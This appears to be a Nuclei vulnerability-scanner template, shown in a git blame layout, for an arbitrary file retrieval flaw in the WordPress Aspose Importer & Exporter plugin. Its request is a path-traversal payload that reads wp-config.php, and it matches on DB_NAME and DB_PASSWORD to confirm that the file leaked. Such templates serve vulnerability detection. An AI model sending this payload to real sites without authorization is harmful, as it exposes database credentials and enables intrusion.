2021-10-22 10:29:44 +00:00
|
|
|
id: aspose-ie-file-download
|
2021-10-21 23:41:10 +00:00
|
|
|
|
|
|
|
info:
|
2022-05-13 20:26:43 +00:00
|
|
|
name: Wordpress Aspose Importer & Exporter v1.0 - Arbitrary File Retrieval
|
2021-10-21 23:41:10 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-05-13 20:26:43 +00:00
|
|
|
description: The Aspose importer and Exporter WordPress plugin is affected by an arbitrary file retrieval vulnerability.
|
2021-10-21 23:41:10 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/131162/
|
|
|
|
- https://wordpress.org/plugins/aspose-importer-exporter
|
2021-10-22 10:29:44 +00:00
|
|
|
tags: wordpress,wp-plugin,lfi,aspose
|
2021-10-21 23:41:10 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "DB_NAME"
|
|
|
|
- "DB_PASSWORD"
|
|
|
|
part: body
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|